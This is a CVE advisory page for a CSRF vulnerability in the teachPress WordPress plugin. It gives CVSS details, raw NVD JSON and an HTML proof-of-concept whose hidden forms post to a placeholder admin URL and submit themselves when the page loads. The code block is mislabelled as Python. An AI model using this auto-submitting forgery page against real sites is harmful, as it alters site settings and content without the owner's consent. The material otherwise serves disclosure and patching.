Security Vulnerability Report
中文
CVE-2026-22483 CVSS 5.4 MEDIUM

CVE-2026-22483

Published: 2026-01-22 17:16:36
Last Modified: 2026-04-15 00:35:42

Description

Cross-Site Request Forgery (CSRF) vulnerability in winkm89 teachPress teachpress allows Cross Site Request Forgery.This issue affects teachPress: from n/a through <= 9.0.12.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

teachPress <= 9.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-22483 - teachPress Plugin --> <html> <body> <h1>CSRF Attack - teachPress Plugin</h1> <p>This PoC demonstrates a Cross-Site Request Forgery attack against teachPress plugin.</p> <!-- Example: Modify plugin settings --> <form action="http://target-site/wp-admin/admin.php?page=teachpress/settings" method="POST" id="csrf-form"> <input type="hidden" name="teachpress_settings[general][name]" value="Malicious Course" /> <input type="hidden" name="teachpress_settings[general][description]" value="Compromised by CSRF" /> <input type="hidden" name="save_settings" value="1" /> </form> <!-- Example: Add malicious course --> <form action="http://target-site/wp-admin/admin.php?page=teachpress/courses&action=new_course" method="POST"> <input type="hidden" name="name" value="Malicious Course" /> <input type="hidden" name="description" value="CSRF Attack Course" /> <input type="hidden" name="save" value="1" /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this text, the attack failed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22483", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:36.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in winkm89 teachPress teachpress allows Cross Site Request Forgery.This issue affects teachPress: from n/a through <= 9.0.12."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en winkm89 teachPress teachpress permite la falsificación de petición en sitios cruzados. Este problema afecta a teachPress: desde n/a hasta &lt;= 9.0.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/teachpress/vulnerability/wordpress-teachpress-plugin-9-0-12-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}